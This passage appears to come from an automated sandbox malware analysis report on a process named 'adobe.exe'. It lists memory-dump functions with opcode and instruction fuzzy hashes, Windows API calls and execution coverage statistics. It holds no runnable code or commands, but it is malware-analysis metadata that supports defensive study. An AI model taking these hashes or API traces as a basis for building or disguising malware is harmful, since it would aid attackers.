Instruction Fuzzy Hash: 8401F9357102105FEB6587BE981076BB7D6DBC9710F10883AE60BC7391EA26DC024791

Function 06EF3F78 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f06787c1aca64f33bcd96697efc401098458325f0ab85fff7fc4310ce436f6c3
Instruction ID: 57371dd417a4fc44dd622d013576dbe9985bb715217e546c013efab8a455ce62
Opcode Fuzzy Hash: f06787c1aca64f33bcd96697efc401098458325f0ab85fff7fc4310ce436f6c3
Instruction Fuzzy Hash: BC11CE32B112258FDB949668D854AEF73EBEBC8211B144439D506E7384EA658C018BD1

Function 06EF3C30 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ef8426e5a98fc91a41e288ce739e7166ed7b8da79fef4207bf6d98e6d94ad5b
Instruction ID: ef0db0c5a1e538b4bde4ac5fe78969d16994fdc89c9beccbfb9be996d6e58c93
Opcode Fuzzy Hash: 0ef8426e5a98fc91a41e288ce739e7166ed7b8da79fef4207bf6d98e6d94ad5b
Instruction Fuzzy Hash: F521F2B1D01269AFCB00DF9AD885ADEFBB4FB48710F10812AE918A7340C374A954CFE5

Function 06EF3F67 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8fc4e005db83648045b0f8f5edfe68f7529beabf7de2723e2a3ffe19b8435e5
Instruction ID: 3cb8c80189d57bca8db2e124bae9b5bd30a49e287e8fef8183f4e04ac48733cc
Opcode Fuzzy Hash: b8fc4e005db83648045b0f8f5edfe68f7529beabf7de2723e2a3ffe19b8435e5
Instruction Fuzzy Hash: EC012436B211611FDB94D678EC54AEF7BBBDBC4211F180239E506E3384EA648C0287E2

Function 06EFF118 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d6eba7fb9682159c987c2c8598a7b87560b0a84ed8475114ea66df3f483c927
Instruction ID: fc28ccc33f94e92ea2f02072d7c5bc9704b091c6f0793191ac42c4803b79ca06
Opcode Fuzzy Hash: 9d6eba7fb9682159c987c2c8598a7b87560b0a84ed8475114ea66df3f483c927
Instruction Fuzzy Hash: 40012471B202111BDA64967DDC5072E72D6DBC9724F108839E20AC7381EE25CC064395

Function 06EFA27A Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df222e509af48710fe0f7b54f627f2157534d814aece92f874ee7cd94f70d0eb
Instruction ID: 43c246d5cdb91609864334ee0502a0ad1c2dae4b5c9b7c7b9dae27e0820088bb
Opcode Fuzzy Hash: df222e509af48710fe0f7b54f627f2157534d814aece92f874ee7cd94f70d0eb
Instruction Fuzzy Hash: 9801D430B202559FE7659B7ED85072B77D6E7CA714F108C39E60ECB341EA2ADC068791

Function 0163D02B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2363015261.000000000163D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0163D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_163d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction ID: 8386645c7989504d7bbf6df23b1ba980cfa22de83a3c7fb2cd45b9e3c4ef7004
Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction Fuzzy Hash: 5A11A675504284DFCB12CF58D9C0B15FBA2FB84214F28C6AAD8494B7A6C33AD44ACB62

Function 06EF3C38 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0aafab084199567fd7d91c38e189430cc0b993e2597d68e57af55227184877cc
Instruction ID: aa791b6fdde9c221a79184e89ec9be91024761a3aa401b2b90a19b821c3da0b9
Opcode Fuzzy Hash: 0aafab084199567fd7d91c38e189430cc0b993e2597d68e57af55227184877cc
Instruction Fuzzy Hash: 7611D0B1D01259EFCB00CF9AD884ACEFBB4FB48714F10812AE918A7340C374A954CFA5

Function 06EF41C0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2040bf7b98b9efe833a417f35a7f6ed554f0e8fbce8195b76f2ae416233cc271
Instruction ID: 814bfd2d75e71f2284ac74b0b239d6a14795df9bdfa76080601e1dae523eb007
Opcode Fuzzy Hash: 2040bf7b98b9efe833a417f35a7f6ed554f0e8fbce8195b76f2ae416233cc271
Instruction Fuzzy Hash: 3701D631B101108BEB6596AE985076FB2DBEBC9714F10C83AE60AC7381EE26DC024394

Function 06EFF125 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2613921b34df902b73fbefc91c7c3529eb32030a4f302f5750ff899c57a04efa
Instruction ID: e0f4be835fb747dbb5fa8401e0d7c32c32f7d251d1f8df3f475eaa2babf63c4f
Opcode Fuzzy Hash: 2613921b34df902b73fbefc91c7c3529eb32030a4f302f5750ff899c57a04efa
Instruction Fuzzy Hash: 4F01D171B202211BDB65967DD85072F73D7EBC9724F108839E20EC7341EE65DC064784

Function 06EFF128 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 204e3e5d3fb439ffaee9d62de70c954c40058985336d26804d2d4d22f3991cf5
Instruction ID: b6291e100a6d2611d8364bf7e8e2f4345bb92b42755ab6fb3273410752f05cb6
Opcode Fuzzy Hash: 204e3e5d3fb439ffaee9d62de70c954c40058985336d26804d2d4d22f3991cf5
Instruction Fuzzy Hash: DE01FF71B202210BDB65967DD85072F73D7EBC9724F108839E20EC7341EE66DC064384

Function 06EFA288 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c01f9712baf9d5c7a162d5b0882cb72d77837cf8a79a86769f56275cbb40e56
Instruction ID: a7e1738bc41bff42c07ab0b6ef3d54cbbbcf1b7badf1e2526d1b80eb0b7a4bc0
Opcode Fuzzy Hash: 4c01f9712baf9d5c7a162d5b0882cb72d77837cf8a79a86769f56275cbb40e56
Instruction Fuzzy Hash: A4018130B202158FEB65EB6DE45472AB3D6E789754F108C38E60ECB340EE2AEC018784

Function 06EF63E0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2372226754.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ef0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9817493cac331b5b84ba2c2054420e7e5da64e8d780ae5fe292ca227fea24b25
Instruction ID: b0cfb6b6c472815f07630985e362ba7274045b853516cf1ef978eebe0bcfb9e6
Opcode Fuzzy Hash: 9817493cac331b5b84ba2c2054420e7e5da64e8d780ae5fe292ca227fea24b25
Instruction Fuzzy Hash: 02F0E5709283C89FDB91DF74885535A3FE8DB47104F1144E9C545CB102E339C903C702

Analysis Process: adobe.exePID: 3492, Parent PID: 4004COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	80
Total number of Limit Nodes:	1

Executed Functions

Function 0171A508 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0171A75E

Memory Dump Source

Source File: 00000007.00000002.2363198937.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c89d9b2f0471cc7f2456489901a43755bde62282dd6b3c73198c1fa2537e4a6e
Instruction ID: 7e20d5c166abf772a2964ce89286ffb9c1d208e6d44fb9a4bb4a3deb3dee573c
Opcode Fuzzy Hash: c89d9b2f0471cc7f2456489901a43755bde62282dd6b3c73198c1fa2537e4a6e
Instruction Fuzzy Hash: 3B712270A01B458FE724CF2ED45475ABBF1BF88200F10892ED54AD7A54DB74E845CB91

Function 0171AEF0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0171CDA6,?,?,?,?,?), ref: 0171CE67

Memory Dump Source

Source File: 00000007.00000002.2363198937.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 34a9d7081ddc6446d47f44ade1b40970e62ce7c3ae476a516d46e71b2b69bbf8
Instruction ID: c17377ce784d585a95b24d3a9d034dff9c328151ed2fbcda280a8d190d373dbc
Opcode Fuzzy Hash: 34a9d7081ddc6446d47f44ade1b40970e62ce7c3ae476a516d46e71b2b69bbf8
Instruction Fuzzy Hash: F221D4B5900248DFDB10CFAAD884ADEFBF8EB48310F14841AE954A7310D374A954CFA5

Function 0171CDD8 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0171CDA6,?,?,?,?,?), ref: 0171CE67

Memory Dump Source

Source File: 00000007.00000002.2363198937.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6972b9191fa726e2203de67a934ac74dec0575c8276147273c7a2e93015a7cdf
Instruction ID: d58f1f7d3523366719bca7d5df23f60f7d1532a41fa37706a313ff6382888ec4
Opcode Fuzzy Hash: 6972b9191fa726e2203de67a934ac74dec0575c8276147273c7a2e93015a7cdf
Instruction Fuzzy Hash: 6821D4B5900258EFDB10CFAAD584ADEFFF8EB48310F14841AE914A3210D374A954CF65

Function 017198C8 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0171A7D9,00000800,00000000,00000000), ref: 0171A9EA

Memory Dump Source

Source File: 00000007.00000002.2363198937.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_adobe.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 93fb6470d54d2f303eaefb7c44a3bcd0f1c74ff8505cc0d49e820c176851b374
Instruction ID: 7df4ae881d64de3fd60a46bfbfe5fc16b980da1cc6e91a273a0a5561ce47911f
Opcode Fuzzy Hash: 93fb6470d54d2f303eaefb7c44a3bcd0f1c74ff8505cc0d49e820c176851b374
Instruction Fuzzy Hash: 841103B69043499FDB10CF9AD844A9EFBF5EB49320F11842AD959A7200C375A544CFA5

Function 0171A978 Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0171A7D9,00000800,00000000,00000000), ref: 0171A9EA

Memory Dump Source

Source File: 00000007.00000002.2363198937.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_adobe.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: aa7b794984ca55800710617e5438e1ab7733eb4200abcba5004f8f5946491b62
Instruction ID: 2acd9f1325cf48af72f688063f56890447407307c3206f314ebdcb2cdc05290b
Opcode Fuzzy Hash: aa7b794984ca55800710617e5438e1ab7733eb4200abcba5004f8f5946491b62
Instruction Fuzzy Hash: 5A1156B6800349CFDB10CF9AC484ADEFFF9EB48320F10842AE559A7200C375A544CFA4

Function 0171A6F8 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0171A75E

Memory Dump Source

Source File: 00000007.00000002.2363198937.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1710000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d9b2dd33bfb1be9214e7fd062511d718066ad752aa472ef19f1b2df3c033cd22
Instruction ID: 11ad6f044f739f1277d04ae0603feddeb8dccebe8bc9b35301ffeb1028193379
Opcode Fuzzy Hash: d9b2dd33bfb1be9214e7fd062511d718066ad752aa472ef19f1b2df3c033cd22
Instruction Fuzzy Hash: 3C110FB5C00749CFDB10CF9AC444BDEFBF5EB88220F10842AD919A7200C379A645CFA1

Function 016CD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2362377571.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16cd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 606cad6a4fe108814e761e29d86eeeac67554d32a895f2b2ac5087c13350ec6c
Instruction ID: 109689e3aebc50d08aaf2d6e411fed9e1963055ca11567ffad5413228bbfcd05
Opcode Fuzzy Hash: 606cad6a4fe108814e761e29d86eeeac67554d32a895f2b2ac5087c13350ec6c
Instruction Fuzzy Hash: 3F21F271604204EFDB15DF68D9C0B26BBA5FB84B14F20C57DD90A4B386C33AD847CAA2

Function 016CD1EC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2362377571.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16cd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e09205428d754f05f3129efb2f476ac490e4c8a50dc9d579b4222f1f6bd70e6
Instruction ID: 26c5b27b91fad63ac890a570822945430e93ef9f05d43301d36580b5ad6d7949
Opcode Fuzzy Hash: 2e09205428d754f05f3129efb2f476ac490e4c8a50dc9d579b4222f1f6bd70e6
Instruction Fuzzy Hash: DF21D371504204EFDB05DF94D9C0B26BB66FB84B24F20C57DDA094B352C37AD846CAA1

Function 016CD017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2362377571.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16cd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction ID: eb57fd370fd69f8def5874a956e5d40a1574cf1451952d729e27ff1d9103af4a
Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction Fuzzy Hash: E711AC75604280DFCB12CF58D9C4B25BB61FB84614F24C6ADD8494B756C33AD40ACBA2

Function 016CD1E7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2362377571.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_16cd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction ID: 3db82d1568d025ac9fb71d2880bc68bbfde9bbfcb5d8d973926290875bda73cc
Opcode Fuzzy Hash: 42a98d763aa616cafc5cdf308aa0cc1e619621035a6359fb41dac703237424f2
Instruction Fuzzy Hash: 5C11BE75504240DFDB02CF54D9C0B25BF62FB84624F24C6ADD9094B356C33AD40ACB91

Analysis Process: adobe.exePID: 4972, Parent PID: 3492COMMON

Execution Graph

Execution Coverage:	14.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	72
Total number of Limit Nodes:	10

Executed Functions

Function 06A82750 Relevance: 1.5, Instructions: 1483COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cf58426f603e74810281cf8f7b63d813557c3f8c33d466af35bd95bac6e2747
Instruction ID: 59f3d0debdb25807cf293bf6a833175a29fd8c12d731ec1997135dd9638d68f6
Opcode Fuzzy Hash: 0cf58426f603e74810281cf8f7b63d813557c3f8c33d466af35bd95bac6e2747
Instruction Fuzzy Hash: CAD25B30E00615CFDB64EBA4C494AADB7B2FF89310F54C5AAD449AB355EB31ED85CB80

Function 06A86560 Relevance: .8, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d991d548cf8e34de99fe603022ece7a0debd4609dad21e715b6393069eb99084
Instruction ID: 9e6f60023e8518b725814a1b8545249ec934f03b942f207c39d43827c4cddb3b
Opcode Fuzzy Hash: d991d548cf8e34de99fe603022ece7a0debd4609dad21e715b6393069eb99084
Instruction Fuzzy Hash: 90628C34A002158FEB54FB68D594BADBBB2FF89314F149569E406AB394DB35EC42CB80

Function 06A8B1A8 Relevance: .8, Instructions: 765COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff8618b6bf755d65e6b6c6f1d79769ae1556ddde45108bf65460eff1f0e098e7
Instruction ID: 047e44362e5e32570b3057d216c3b8c6b4fba3f90e63f5be2f0ad28955b68917
Opcode Fuzzy Hash: ff8618b6bf755d65e6b6c6f1d79769ae1556ddde45108bf65460eff1f0e098e7
Instruction Fuzzy Hash: D9524E30E102198FEB64FB69D4907AEB7B2FB89310F208566E445DB355DB34EC85CBA1

Function 06A8C0F8 Relevance: .6, Instructions: 639
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9db67df77209651c6616075d6a88848f9e9bd4437b9e9eceef3426911e5077d
Instruction ID: c22529227205c7f5aa2795ea8757a1a1649f1e75fa9beb81da246b39d51c7856
Opcode Fuzzy Hash: e9db67df77209651c6616075d6a88848f9e9bd4437b9e9eceef3426911e5077d
Instruction Fuzzy Hash: 36324E34B102198FDF54EB69D490BADB7B2FB89320F208565E506EB355DB35EC42CBA0

Function 06A85550 Relevance: .6, Instructions: 579
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53e6cbb9744902f9b5085efdb7cde94f76a7a8b338516340eb16d1242675caf2
Instruction ID: fc339a3f99b7758041b8b220f2e00ee6e248b03e40220ae2b2e553c7bd590528
Opcode Fuzzy Hash: 53e6cbb9744902f9b5085efdb7cde94f76a7a8b338516340eb16d1242675caf2
Instruction Fuzzy Hash: 4E12A175F002158FDBA4FBA5D8807AEBBB2EB85210F14887ADC559F345DA34EC42CB90

Function 06A87CF8 Relevance: .5, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ac9bdc842d60e03b63c09e8bb85be12234a2c3fe8dce177594400691407a0ea
Instruction ID: a3c697158c50e1f800809b81ef39a3cb8d4f5875a0639194a5e9984ebbfedc20
Opcode Fuzzy Hash: 0ac9bdc842d60e03b63c09e8bb85be12234a2c3fe8dce177594400691407a0ea
Instruction Fuzzy Hash: 15029030B016168FDB54EB65D8907AEB7F2FF88314F648569E4069B394EB35EC42CB90

Function 06A8A318 Relevance: 2.6, Strings: 2, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X!@, xrefs: 06A8A38B
x!@, xrefs: 06A8A3AC

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID: X!@$x!@
API String ID: 0-2527372166
Opcode ID: 68ab57fc154f2af492a4c5d94102151722f76d971918f34cb638880dee439330
Instruction ID: 19c69d05525e52b49a87fae1172b9f7640bcd714330ae7969ea021e8885be857
Opcode Fuzzy Hash: 68ab57fc154f2af492a4c5d94102151722f76d971918f34cb638880dee439330
Instruction Fuzzy Hash: 7B31E331F102154FDB64BBA9D4906AEB7B6FB89310F50853AE64AEB340EA359D42C790

Function 0124ED40 Relevance: 1.6, APIs: 1, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.4607653547.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1240000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be27bde716a2b32e1419062a85d9b025467785884282834f35c57ccd5a87e172
Instruction ID: b0287f9e6748c4f532ce589ebc43ee9a055342fddf188da0f4582db441824c2e
Opcode Fuzzy Hash: be27bde716a2b32e1419062a85d9b025467785884282834f35c57ccd5a87e172
Instruction Fuzzy Hash: 03412472E04755CFDB04DFAAD80469EBBF5FF8A210F15856AE508A7240DB789844CBE1

Function 0124EE10 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 0124EE7F

Memory Dump Source

Source File: 00000008.00000002.4607653547.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1240000_adobe.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 975596105a231f901d07e5f615bfd7b1eacd522d7472fe612b140464b30b0001
Instruction ID: 07437c00f611b8d747f2bdc37a441412fba4765b1b5b4c6fecdac2785208eb09
Opcode Fuzzy Hash: 975596105a231f901d07e5f615bfd7b1eacd522d7472fe612b140464b30b0001
Instruction Fuzzy Hash: F511FFB2D0065ADFDB10CF9AC54579EFBF4BF48220F15812AD918A7240D378A954CFA5

Function 06A8FEE9 Relevance: 1.3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|, xrefs: 06A8FF48

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 524061f3685e679fed3ec995c4c86fa9994ba3e7619f81cdbd6aa4fde6729dc6
Instruction ID: 9088faa04fb90bfd7c8e7e1ad0ff9b053567f1f55e82b303aeead904d599516b
Opcode Fuzzy Hash: 524061f3685e679fed3ec995c4c86fa9994ba3e7619f81cdbd6aa4fde6729dc6
Instruction Fuzzy Hash: D2113A75B102159FDB44EBB8D805B6EBBF1AF8C641F108469EA0AE73A4DB759D01CB80

Function 06A8FEF8 Relevance: 1.3, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|, xrefs: 06A8FF48

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 569e0fb38f942d9d9049e63180ccd4f94a80a0847cb1a14da86761925b662eea
Instruction ID: 05091f8995cfea981ecd1a46c2ca3e08758192912bfd04c4742e3b307c271e88
Opcode Fuzzy Hash: 569e0fb38f942d9d9049e63180ccd4f94a80a0847cb1a14da86761925b662eea
Instruction Fuzzy Hash: B0115B74B10225DFDB44EFB88804B6EBBF1AF8D640F108469EA0AE7390DB759D01CB80

Function 06A8CEC8 Relevance: .8, Instructions: 796
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85e156e5fbc13b9fd16c783841fcf211b7c2824ee07584e86330ca14cc29fe81
Instruction ID: 7e942e87ef40943319042f0c64b925f063e5c489f215b86888830fce61325ec2
Opcode Fuzzy Hash: 85e156e5fbc13b9fd16c783841fcf211b7c2824ee07584e86330ca14cc29fe81
Instruction Fuzzy Hash: 70624034A00216CFDB55FB69E590A9EB7B2FF89300F208668D0059F359EB75EC46CB90

Function 06A8AC40 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
